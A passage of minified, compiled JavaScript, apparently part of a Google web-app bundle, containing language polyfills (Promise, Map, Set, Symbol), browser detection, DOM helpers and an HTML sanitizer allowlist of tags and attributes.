yb=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};zb=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.Ab=zb(this);
|
||||
x=function(a,b){if(b)a:{var c=_.Ab;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&yb(c,a,{configurable:!0,writable:!0,value:b})}};
|
||||
x("Symbol",function(a){if(a)return a;var b=function(f,g){this.g=f;yb(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("b");return new b(c+(f||"")+"_"+d++,f)};return e});
|
||||
x("Symbol.iterator",function(a){if(a)return a;a=Symbol("c");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=_.Ab[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&yb(d.prototype,a,{configurable:!0,writable:!0,value:function(){return Bb(xb(this))}})}return a});Bb=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};
|
||||
Cb=typeof Object.create=="function"?Object.create:function(a){var b=function(){};b.prototype=a;return new b};
|
||||
_.Db=function(){function a(){function c(){}new c;Reflect.construct(c,[],function(){});return new c instanceof c}if(typeof Reflect!="undefined"&&Reflect.construct){if(a())return Reflect.construct;var b=Reflect.construct;return function(c,d,e){c=b(c,d);e&&Reflect.setPrototypeOf(c,e.prototype);return c}}return function(c,d,e){e===void 0&&(e=c);e=Cb(e.prototype||Object.prototype);return Function.prototype.apply.call(c,e,d)||e}}();
|
||||
if(typeof Object.setPrototypeOf=="function")Eb=Object.setPrototypeOf;else{var Fb;a:{var Gb={a:!0},Hb={};try{Hb.__proto__=Gb;Fb=Hb.a;break a}catch(a){}Fb=!1}Eb=Fb?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError("d`"+a);return a}:null}Ib=Eb;
|
||||
_.y=function(a,b){a.prototype=Cb(b.prototype);a.prototype.constructor=a;if(Ib)Ib(a,b);else for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.P=b.prototype};_.z=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:xb(a)};throw Error("e`"+String(a));};
|
||||
_.Jb=function(a){if(!(a instanceof Array)){a=_.z(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a};_.B=function(a){return Kb(a,a)};Kb=function(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return a};Lb=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};Mb=typeof Object.assign=="function"?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Lb(d,e)&&(a[e]=d[e])}return a};
|
||||
x("Object.assign",function(a){return a||Mb});_.cb=function(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[c];return b};x("globalThis",function(a){return a||_.Ab});x("Reflect",function(a){return a?a:{}});x("Reflect.construct",function(){return _.Db});x("Reflect.setPrototypeOf",function(a){return a?a:Ib?function(b,c){try{return Ib(b,c),!0}catch(d){return!1}}:null});
|
||||
x("Promise",function(a){function b(){this.g=null}function c(g){return g instanceof e?g:new e(function(h){h(g)})}if(a)return a;b.prototype.h=function(g){if(this.g==null){this.g=[];var h=this;this.j(function(){h.o()})}this.g.push(g)};var d=_.Ab.setTimeout;b.prototype.j=function(g){d(g,0)};b.prototype.o=function(){for(;this.g&&this.g.length;){var g=this.g;this.g=[];for(var h=0;h<g.length;++h){var k=g[h];g[h]=null;try{k()}catch(m){this.l(m)}}}this.g=null};b.prototype.l=function(g){this.j(function(){throw g;
|
||||
})};var e=function(g){this.g=0;this.j=void 0;this.h=[];this.B=!1;var h=this.l();try{g(h.resolve,h.reject)}catch(k){h.reject(k)}};e.prototype.l=function(){function g(m){return function(n){k||(k=!0,m.call(h,n))}}var h=this,k=!1;return{resolve:g(this.M),reject:g(this.o)}};e.prototype.M=function(g){if(g===this)this.o(new TypeError("h"));else if(g instanceof e)this.O(g);else{a:switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.I(g):this.A(g)}};e.prototype.I=
|
||||
function(g){var h=void 0;try{h=g.then}catch(k){this.o(k);return}typeof h=="function"?this.pa(h,g):this.A(g)};e.prototype.o=function(g){this.C(2,g)};e.prototype.A=function(g){this.C(1,g)};e.prototype.C=function(g,h){if(this.g!=0)throw Error("i`"+g+"`"+h+"`"+this.g);this.g=g;this.j=h;this.g===2&&this.J();this.F()};e.prototype.J=function(){var g=this;d(function(){if(g.G()){var h=_.Ab.console;typeof h!=="undefined"&&h.error(g.j)}},1)};e.prototype.G=function(){if(this.B)return!1;var g=_.Ab.CustomEvent,
|
||||
h=_.Ab.Event,k=_.Ab.dispatchEvent;if(typeof k==="undefined")return!0;typeof g==="function"?g=new g("unhandledrejection",{cancelable:!0}):typeof h==="function"?g=new h("unhandledrejection",{cancelable:!0}):(g=_.Ab.document.createEvent("CustomEvent"),g.initCustomEvent("unhandledrejection",!1,!0,g));g.promise=this;g.reason=this.j;return k(g)};e.prototype.F=function(){if(this.h!=null){for(var g=0;g<this.h.length;++g)f.h(this.h[g]);this.h=null}};var f=new b;e.prototype.O=function(g){var h=this.l();g.Ld(h.resolve,
|
||||
h.reject)};e.prototype.pa=function(g,h){var k=this.l();try{g.call(h,k.resolve,k.reject)}catch(m){k.reject(m)}};e.prototype.then=function(g,h){function k(q,r){return typeof q=="function"?function(t){try{m(q(t))}catch(A){n(A)}}:r}var m,n,p=new e(function(q,r){m=q;n=r});this.Ld(k(g,m),k(h,n));return p};e.prototype.catch=function(g){return this.then(void 0,g)};e.prototype.Ld=function(g,h){function k(){switch(m.g){case 1:g(m.j);break;case 2:h(m.j);break;default:throw Error("j`"+m.g);}}var m=this;this.h==
|
||||
null?f.h(k):this.h.push(k);this.B=!0};e.resolve=c;e.reject=function(g){return new e(function(h,k){k(g)})};e.race=function(g){return new e(function(h,k){for(var m=_.z(g),n=m.next();!n.done;n=m.next())c(n.value).Ld(h,k)})};e.all=function(g){var h=_.z(g),k=h.next();return k.done?c([]):new e(function(m,n){function p(t){return function(A){q[t]=A;r--;r==0&&m(q)}}var q=[],r=0;do q.push(void 0),r++,c(k.value).Ld(p(q.length-1),n),k=h.next();while(!k.done)})};return e});
|
||||
var Nb=function(a,b,c){if(a==null)throw new TypeError("k`"+c);if(b instanceof RegExp)throw new TypeError("l`"+c);return a+""};x("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Nb(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for(var g=0;g<f&&c<e;)if(d[c++]!=b[g++])return!1;return g>=f}});x("Object.setPrototypeOf",function(a){return a||Ib});x("Symbol.dispose",function(a){return a?a:Symbol("m")});
|
||||
x("WeakMap",function(a){function b(){}function c(k){var m=typeof k;return m==="object"&&k!==null||m==="function"}function d(k){if(!Lb(k,f)){var m=new b;yb(k,f,{value:m})}}function e(k){var m=Object[k];m&&(Object[k]=function(n){if(n instanceof b)return n;Object.isExtensible(n)&&d(n);return m(n)})}if(function(){if(!a||!Object.seal)return!1;try{var k=Object.seal({}),m=Object.seal({}),n=new a([[k,2],[m,3]]);if(n.get(k)!=2||n.get(m)!=3)return!1;n.delete(k);n.set(m,4);return!n.has(k)&&n.get(m)==4}catch(p){return!1}}())return a;
|
||||
var f="$jscomp_hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var g=0,h=function(k){this.g=(g+=Math.random()+1).toString();if(k){k=_.z(k);for(var m;!(m=k.next()).done;)m=m.value,this.set(m[0],m[1])}};h.prototype.set=function(k,m){if(!c(k))throw Error("n");d(k);if(!Lb(k,f))throw Error("o`"+k);k[f][this.g]=m;return this};h.prototype.get=function(k){return c(k)&&Lb(k,f)?k[f][this.g]:void 0};h.prototype.has=function(k){return c(k)&&Lb(k,f)&&Lb(k[f],this.g)};h.prototype.delete=function(k){return c(k)&&
|
||||
Lb(k,f)&&Lb(k[f],this.g)?delete k[f][this.g]:!1};return h});
|
||||
x("Map",function(a){if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.z([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||k.get({x:4})||k.set({x:4},"t")!=k||k.size!=2)return!1;var m=k.entries(),n=m.next();if(n.done||n.value[0]!=h||n.value[1]!="s")return!1;n=m.next();return n.done||n.value[0].x!=4||n.value[1]!="t"||!m.next().done?!1:!0}catch(p){return!1}}())return a;var b=new WeakMap,c=function(h){this[0]={};this[1]=
|
||||
f();this.size=0;if(h){h=_.z(h);for(var k;!(k=h.next()).done;)k=k.value,this.set(k[0],k[1])}};c.prototype.set=function(h,k){h=h===0?0:h;var m=d(this,h);m.list||(m.list=this[0][m.id]=[]);m.entry?m.entry.value=k:(m.entry={next:this[1],zb:this[1].zb,head:this[1],key:h,value:k},m.list.push(m.entry),this[1].zb.next=m.entry,this[1].zb=m.entry,this.size++);return this};c.prototype.delete=function(h){h=d(this,h);return h.entry&&h.list?(h.list.splice(h.index,1),h.list.length||delete this[0][h.id],h.entry.zb.next=
|
||||
h.entry.next,h.entry.next.zb=h.entry.zb,h.entry.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].zb=f();this.size=0};c.prototype.has=function(h){return!!d(this,h).entry};c.prototype.get=function(h){return(h=d(this,h).entry)&&h.value};c.prototype.entries=function(){return e(this,function(h){return[h.key,h.value]})};c.prototype.keys=function(){return e(this,function(h){return h.key})};c.prototype.values=function(){return e(this,function(h){return h.value})};c.prototype.forEach=
|
||||
function(h,k){for(var m=this.entries(),n;!(n=m.next()).done;)n=n.value,h.call(k,n[1],n[0],this)};c.prototype[Symbol.iterator]=c.prototype.entries;var d=function(h,k){var m=k&&typeof k;m=="object"||m=="function"?b.has(k)?m=b.get(k):(m=""+ ++g,b.set(k,m)):m="p_"+k;var n=h[0][m];if(n&&Lb(h[0],m))for(h=0;h<n.length;h++){var p=n[h];if(k!==k&&p.key!==p.key||k===p.key)return{id:m,list:n,index:h,entry:p}}return{id:m,list:n,index:-1,entry:void 0}},e=function(h,k){var m=h[1];return Bb(function(){if(m){for(;m.head!=
|
||||
h[1];)m=m.zb;for(;m.next!=m.head;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.zb=h.next=h.head=h},g=0;return c});
|
||||
x("Set",function(a){if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.z([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||f.value[0].x!=4||f.value[1]!=f.value[0]?!1:e.next().done}catch(g){return!1}}())return a;var b=function(c){this.g=new Map;if(c){c=
|
||||
_.z(c);for(var d;!(d=c.next()).done;)this.add(d.value)}this.size=this.g.size};b.prototype.add=function(c){c=c===0?0:c;this.g.set(c,c);this.size=this.g.size;return this};b.prototype.delete=function(c){c=this.g.delete(c);this.size=this.g.size;return c};b.prototype.clear=function(){this.g.clear();this.size=0};b.prototype.has=function(c){return this.g.has(c)};b.prototype.entries=function(){return this.g.entries()};b.prototype.values=function(){return this.g.values()};b.prototype.keys=b.prototype.values;
|
||||
b.prototype[Symbol.iterator]=b.prototype.values;b.prototype.forEach=function(c,d){var e=this;this.g.forEach(function(f){return c.call(d,f,f,e)})};return b});var Ob=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[Symbol.iterator]=function(){return e};return e};x("Array.prototype.entries",function(a){return a?a:function(){return Ob(this,function(b,c){return[b,c]})}});
|
||||
x("Array.prototype.keys",function(a){return a?a:function(){return Ob(this,function(b){return b})}});x("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=Nb(this,b,"endsWith");c===void 0&&(c=d.length);c=Math.max(0,Math.min(c|0,d.length));for(var e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});x("Number.isFinite",function(a){return a?a:function(b){return typeof b!=="number"?!1:!isNaN(b)&&b!==Infinity&&b!==-Infinity}});
|
||||
x("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});x("Object.entries",function(a){return a?a:function(b){var c=[],d;for(d in b)Lb(b,d)&&c.push([d,b[d]]);return c}});
|
||||
x("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.call(d,f.value,g++))}else for(f=b.length,g=0;g<f;g++)e.push(c.call(d,b[g],g));return e}});x("Array.prototype.values",function(a){return a?a:function(){return Ob(this,function(b,c){return c})}});
|
||||
x("Object.values",function(a){return a?a:function(b){var c=[],d;for(d in b)Lb(b,d)&&c.push(b[d]);return c}});x("Object.is",function(a){return a?a:function(b,c){return b===c?b!==0||1/b===1/c:b!==b&&c!==c}});x("Array.prototype.includes",function(a){return a?a:function(b,c){var d=this;d instanceof String&&(d=String(d));var e=d.length;c=c||0;for(c<0&&(c=Math.max(c+e,0));c<e;c++){var f=d[c];if(f===b||Object.is(f,b))return!0}return!1}});
|
||||
x("String.prototype.includes",function(a){return a?a:function(b,c){return Nb(this,b,"includes").indexOf(b,c||0)!==-1}});x("Number.MAX_SAFE_INTEGER",function(){return 9007199254740991});x("Number.MIN_SAFE_INTEGER",function(){return-9007199254740991});x("Number.isInteger",function(a){return a?a:function(b){return Number.isFinite(b)?b===Math.floor(b):!1}});x("Number.isSafeInteger",function(a){return a?a:function(b){return Number.isInteger(b)&&Math.abs(b)<=Number.MAX_SAFE_INTEGER}});
|
||||
x("Math.trunc",function(a){return a?a:function(b){b=Number(b);if(isNaN(b)||b===Infinity||b===-Infinity||b===0)return b;var c=Math.floor(Math.abs(b));return b<0?-c:c}});x("Number.isNaN",function(a){return a?a:function(b){return typeof b==="number"&&isNaN(b)}});x("Array.prototype.fill",function(a){return a?a:function(b,c,d){var e=this.length||0;c<0&&(c=Math.max(0,e+c));if(d==null||d>e)d=e;d=Number(d);d<0&&(d=Math.max(0,e+d));for(c=Number(c||0);c<d;c++)this[c]=b;return this}});
|
||||
var Pb=function(a){return a?a:Array.prototype.fill};x("Int8Array.prototype.fill",Pb);x("Uint8Array.prototype.fill",Pb);x("Uint8ClampedArray.prototype.fill",Pb);x("Int16Array.prototype.fill",Pb);x("Uint16Array.prototype.fill",Pb);x("Int32Array.prototype.fill",Pb);x("Uint32Array.prototype.fill",Pb);x("Float32Array.prototype.fill",Pb);x("Float64Array.prototype.fill",Pb);
|
||||
x("String.prototype.replaceAll",function(a){return a?a:function(b,c){if(b instanceof RegExp&&!b.global)throw new TypeError("p");return b instanceof RegExp?this.replace(b,c):this.replace(new RegExp(String(b).replace(/([-()\[\]{}+?*.$\^|,:#<!\\])/g,"\\$1").replace(/\x08/g,"\\x08"),"g"),c)}});x("Object.getOwnPropertySymbols",function(a){return a?a:function(){return[]}});
|
||||
x("Promise.prototype.finally",function(a){return a?a:function(b){return this.then(function(c){return Promise.resolve(b()).then(function(){return c})},function(c){return Promise.resolve(b()).then(function(){throw c;})})}});x("Array.prototype.flat",function(a){return a?a:function(b){b=b===void 0?1:b;var c=[];Array.prototype.forEach.call(this,function(d){Array.isArray(d)&&b>0?(d=Array.prototype.flat.call(d,b-1),c.push.apply(c,d)):c.push(d)});return c}});
|
||||
_._DumpException=window._DumpException||function(a){throw a;};window._DumpException=_._DumpException;var Qb,Sb,Tb,Ub,Wb,Xb,Yb,Zb;Qb=Qb||{};_.u=this||self;Sb=function(a){var b=_.Rb("WIZ_global_data.oxN3nb");a=b&&b[a];return a!=null?a:!1};Tb=_.u._F_toggles_default_tr||[];Ub=function(){};Ub.get=function(){return null};_.Rb=function(a,b){a=a.split(".");b=b||_.u;for(var c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;return b};_.Vb=function(a){var b=typeof a;return b!="object"?b:a?Array.isArray(a)?"array":b:"null"};_.ra=function(a){var b=_.Vb(a);return b=="array"||b=="object"&&typeof a.length=="number"};
|
||||
_.za=function(a){var b=typeof a;return b=="object"&&a!=null||b=="function"};_.Aa=function(a){return Object.prototype.hasOwnProperty.call(a,Wb)&&a[Wb]||(a[Wb]=++Xb)};Wb="closure_uid_"+(Math.random()*1E9>>>0);Xb=0;Yb=function(a,b,c){return a.call.apply(a.bind,arguments)};
|
||||
Zb=function(a,b,c){if(!a)throw Error();if(arguments.length>2){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}};_.C=function(a,b,c){_.C=Function.prototype.bind&&Function.prototype.bind.toString().indexOf("native code")!=-1?Yb:Zb;return _.C.apply(null,arguments)};
|
||||
_.$b=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};_.ac=function(){return Date.now()};_.bc=function(a,b){a=a.split(".");for(var c=_.u,d;a.length&&(d=a.shift());)a.length||b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};
|
||||
_.E=function(a,b){function c(){}c.prototype=b.prototype;a.P=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.rn=function(d,e,f){for(var g=Array(arguments.length-2),h=2;h<arguments.length;h++)g[h-2]=arguments[h];return b.prototype[e].apply(d,g)}};_.E(_.aa,Error);_.aa.prototype.name="CustomError";var cc;_.E(ba,_.aa);ba.prototype.name="AssertionError";var da;_.dc=function(a,b){this.h=a;this.g=b||null};_.dc.prototype.toString=function(){return this.h};_.ec=new _.dc("n73qwf","n73qwf");var oa=Symbol("r");_.w=function(){this.Da=this.Da;this.pa=this.pa};_.w.prototype.Da=!1;_.w.prototype.eb=function(){return this.Da};_.w.prototype.dispose=function(){this.Da||(this.Da=!0,this.K())};_.w.prototype[Symbol.dispose]=function(){this.dispose()};_.w.prototype.K=function(){if(this.pa)for(;this.pa.length;)this.pa.shift()()};var jc;_.ta=Array.prototype.indexOf?function(a,b){return Array.prototype.indexOf.call(a,b,void 0)}:function(a,b){if(typeof a==="string")return typeof b!=="string"||b.length!=1?-1:a.indexOf(b,0);for(var c=0;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1};
|
||||
_.fc=Array.prototype.lastIndexOf?function(a,b){return Array.prototype.lastIndexOf.call(a,b,a.length-1)}:function(a,b){var c=a.length-1;c<0&&(c=Math.max(0,a.length+c));if(typeof a==="string")return typeof b!=="string"||b.length!=1?-1:a.lastIndexOf(b,c);for(;c>=0;c--)if(c in a&&a[c]===b)return c;return-1};_.hc=Array.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)f in e&&b.call(c,e[f],f,a)};
|
||||
_.ic=Array.prototype.filter?function(a,b){return Array.prototype.filter.call(a,b,void 0)}:function(a,b){for(var c=a.length,d=[],e=0,f=typeof a==="string"?a.split(""):a,g=0;g<c;g++)if(g in f){var h=f[g];b.call(void 0,h,g,a)&&(d[e++]=h)}return d};jc=Array.prototype.reduce?function(a,b,c){Array.prototype.reduce.call(a,b,c)}:function(a,b,c){var d=c;(0,_.hc)(a,function(e,f){d=b.call(void 0,d,e,f,a)})};
|
||||
_.kc=Array.prototype.some?function(a,b){return Array.prototype.some.call(a,b,void 0)}:function(a,b){for(var c=a.length,d=typeof a==="string"?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;return!1};_.lc=function(a,b){this.width=a;this.height=b};_.mc=function(a,b){return a==b?!0:a&&b?a.width==b.width&&a.height==b.height:!1};_.lc.prototype.aspectRatio=function(){return this.width/this.height};_.lc.prototype.ceil=function(){this.width=Math.ceil(this.width);this.height=Math.ceil(this.height);return this};_.lc.prototype.floor=function(){this.width=Math.floor(this.width);this.height=Math.floor(this.height);return this};
|
||||
_.lc.prototype.round=function(){this.width=Math.round(this.width);this.height=Math.round(this.height);return this};var Ea;Ea="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable toLocaleString toString valueOf".split(" ");_.nc=function(a,b,c){for(var d in a)b.call(c,a[d],d,a)};_.oc=String.prototype.trim?function(a){return a.trim()}:function(a){return/^[\s\xa0]*([\s\S]*?)[\s\xa0]*$/.exec(a)[1]};var pc=globalThis.trustedTypes,Ia=pc,Ka;_.Ma=function(a){this.g=a};_.Ma.prototype.toString=function(){return this.g+""};_.qc=Ha(function(){return typeof URL==="function"});_.rc=function(a){this.g=a};_.rc.prototype.toString=function(){return this.g+""};_.sc=Ha(function(){return new _.rc(pc?pc.emptyHTML:"")});_.Qa=function(a){this.g=a};_.Qa.prototype.toString=function(){return this.g+""};_.tc=function(a){return encodeURIComponent(String(a))};_.uc=function(a){return decodeURIComponent(a.replace(/\+/g," "))};_.vc=function(){return Math.floor(Math.random()*2147483648).toString(36)+Math.abs(Math.floor(Math.random()*2147483648)^_.ac()).toString(36)};var wc=!!(Tb[0]>>15&1),xc=!!(Tb[0]>>16&1),yc=!!(Tb[0]&128);_.Va=wc?xc:Sb(610401301);_.zc=wc?yc:Sb(748402147);var Ac;Ac=_.u.navigator;_.Wa=Ac?Ac.userAgentData||null:null;_.Bc=function(a){_.Bc[" "](a);return a};_.Bc[" "]=function(){};var Pc;_.Cc=_.Ya();_.Dc=_.Xa()?!1:_.v("Trident")||_.v("MSIE");_.Ec=_.v("Edge");_.Fc=_.v("Gecko")&&!(_.Ua().toLowerCase().indexOf("webkit")!=-1&&!_.v("Edge"))&&!(_.v("Trident")||_.v("MSIE"))&&!_.v("Edge");_.Gc=_.Ua().toLowerCase().indexOf("webkit")!=-1&&!_.v("Edge");_.Hc=_.Gc&&_.v("Mobile");_.Ic=_.bb();_.Jc=Za()?_.Wa.platform==="Windows":_.v("Windows");_.Kc=Za()?_.Wa.platform==="Android":_.v("Android");_.Lc=_.$a();_.Mc=_.v("iPad");_.Nc=_.v("iPod");_.Oc=_.ab();
|
||||
a:{var Qc="",Rc=function(){var a=_.Ua();if(_.Fc)return/rv:([^\);]+)(\)|;)/.exec(a);if(_.Ec)return/Edge\/([\d\.]+)/.exec(a);if(_.Dc)return/\b(?:MSIE|rv)[: ]([^\);]+)(\)|;)/.exec(a);if(_.Gc)return/WebKit\/(\S+)/.exec(a);if(_.Cc)return/(?:Version)[ \/]?(\S+)/.exec(a)}();Rc&&(Qc=Rc?Rc[1]:"");if(_.Dc){var Sc,Tc=_.u.document;Sc=Tc?Tc.documentMode:void 0;if(Sc!=null&&Sc>parseFloat(Qc)){Pc=String(Sc);break a}}Pc=Qc}_.Uc=Pc;var Vc="ARTICLE SECTION NAV ASIDE H1 H2 H3 H4 H5 H6 HEADER FOOTER ADDRESS P HR PRE BLOCKQUOTE OL UL LH LI DL DT DD FIGURE FIGCAPTION MAIN DIV EM STRONG SMALL S CITE Q DFN ABBR RUBY RB RT RTC RP DATA TIME CODE VAR SAMP KBD SUB SUP I B U MARK BDI BDO SPAN BR WBR NOBR INS DEL PICTURE PARAM TRACK MAP TABLE CAPTION COLGROUP COL TBODY THEAD TFOOT TR TD TH SELECT DATALIST OPTGROUP OPTION OUTPUT PROGRESS METER FIELDSET LEGEND DETAILS SUMMARY MENU DIALOG SLOT CANVAS FONT CENTER ACRONYM BASEFONT BIG DIR HGROUP STRIKE TT".split(" "),
|
||||
Wc=[["A",new Map([["href",{Ca:7}]])],["AREA",new Map([["href",{Ca:7}]])],["LINK",new Map([["href",{Ca:5,conditions:new Map([["rel",new Set("alternate author bookmark canonical cite help icon license next prefetch dns-prefetch prerender preconnect preload prev search subresource".split(" "))]])}]])],["SOURCE",new Map([["src",{Ca:5}],["srcset",{Ca:6}]])],["IMG",new Map([["src",{Ca:5}],["srcset",{Ca:6}]])],["VIDEO",new Map([["src",{Ca:5}]])],["AUDIO",new Map([["src",{Ca:5}]])]],Xc="title aria-atomic aria-autocomplete aria-busy aria-checked aria-current aria-disabled aria-dropeffect aria-expanded aria-haspopup aria-hidden aria-invalid aria-label aria-level aria-live aria-multiline aria-multiselectable aria-orientation aria-posinset aria-pressed aria-readonly aria-relevant aria-required aria-selected aria-setsize aria-sort aria-valuemax aria-valuemin aria-valuenow aria-valuetext alt align autocapitalize autocomplete autocorrect autofocus autoplay bgcolor border cellpadding cellspacing checked cite color cols colspan controls controlslist coords crossorigin datetime disabled download draggable enctype face formenctype frameborder height hreflang hidden inert ismap label lang loop max maxlength media minlength min multiple muted nonce open playsinline placeholder poster preload rel required reversed role rows rowspan selected shape size sizes slot span spellcheck start step summary translate type usemap valign value width wrap itemscope itemtype itemid itemprop itemref".split(" "),
|
||||
Yc=[["dir",{Ca:3,conditions:Ha(function(){return new Map([["dir",new Set(["auto","ltr","rtl"])]])})}],["async",{Ca:3,conditions:Ha(function(){return new Map([["async",new Set(["async"])]])})}],["loading",{Ca:3,conditions:Ha(function(){return new Map([["loading",new Set(["eager","lazy"])]])})}],["target",{Ca:3,conditions:Ha(function(){return new Map([["target",new Set(["_self","_blank"])]])})}]],Zc=new function(a,b,c){var d=new Set(["data-","aria-"]),e=new Map(Wc);this.j=a;this.g=e;this.l=b;this.o=
|
||||
c;this.h=d}(new Set(Ha(function(){return Vc.concat("STYLE TITLE INPUT TEXTAREA BUTTON LABEL".split(" "))})),new Set(Ha(function(){return Xc.concat(["class","id","tabindex","contenteditable","name"])})),new Map(Ha(function(){return Yc.concat([["style",{Ca:1}]])})));var $c;$c=function(){this.g=Zc};_.ad=Ha(function(){return new $c});var fd,ed,id;_.fb=function(a){return a?new _.bd(_.cd(a)):cc||(cc=new _.bd)};_.dd=function(a,b){return typeof b==="string"?a.getElementById(b):b};fd=function(a,b){_.nc(b,function(c,d){d=="style"?a.style.cssText=c:d=="class"?a.className=c:d=="for"?a.htmlFor=c:ed.hasOwnProperty(d)?a.setAttribute(ed[d],c):d.lastIndexOf("aria-",0)==0||d.lastIndexOf("data-",0)==0?a.setAttribute(d,c):a[d]=c})};
|
||||
ed={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valign:"vAlign",width:"width"};_.gd=function(a){a=a.document;a=a.compatMode=="CSS1Compat"?a.documentElement:a.body;return new _.lc(a.clientWidth,a.clientHeight)};_.hb=function(a){return a?a.defaultView:window};
|
||||
_.jd=function(a,b){var c=b[1],d=_.hd(a,String(b[0]));c&&(typeof c==="string"?d.className=c:Array.isArray(c)?d.className=c.join(" "):fd(d,c));b.length>2&&id(a,d,b,2);return d};
|
||||
id=function(a,b,c,d){function e(h){h&&b.appendChild(typeof h==="string"?a.createTextNode(h):h)}for(;d<c.length;d++){var f=c[d];if(!_.ra(f)||_.za(f)&&f.nodeType>0)e(f);else{a:{if(f&&typeof f.length=="number"){if(_.za(f)){var g=typeof f.item=="function"||typeof f.item=="string";break a}if(typeof f==="function"){g=typeof f.item=="function";break a}}g=!1}_.hc(g?_.xa(f):f,e)}}};_.hd=function(a,b){b=String(b);a.contentType==="application/xhtml+xml"&&(b=b.toLowerCase());return a.createElement(b)};
|
||||
_.kd=function(a,b){id(_.cd(a),a,arguments,1)};_.ld=function(a){for(var b;b=a.firstChild;)a.removeChild(b)};_.md=function(a){return a&&a.parentNode?a.parentNode.removeChild(a):null};_.nd=function(a,b){if(!a||!b)return!1;if(a.contains&&b.nodeType==1)return a==b||a.contains(b);if(typeof a.compareDocumentPosition!="undefined")return a==b||!!(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a};_.cd=function(a){return a.nodeType==9?a:a.ownerDocument||a.document};
|
||||
_.od=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.ld(a),a.appendChild(_.cd(a).createTextNode(String(b)))};_.bd=function(a){this.g=a||_.u.document||document};_.l=_.bd.prototype;_.l.D=function(a){return _.dd(this.g,a)};_.l.Dl=_.bd.prototype.D;_.l.getElementsByTagName=function(a,b){return(b||this.g).getElementsByTagName(String(a))};
|
||||
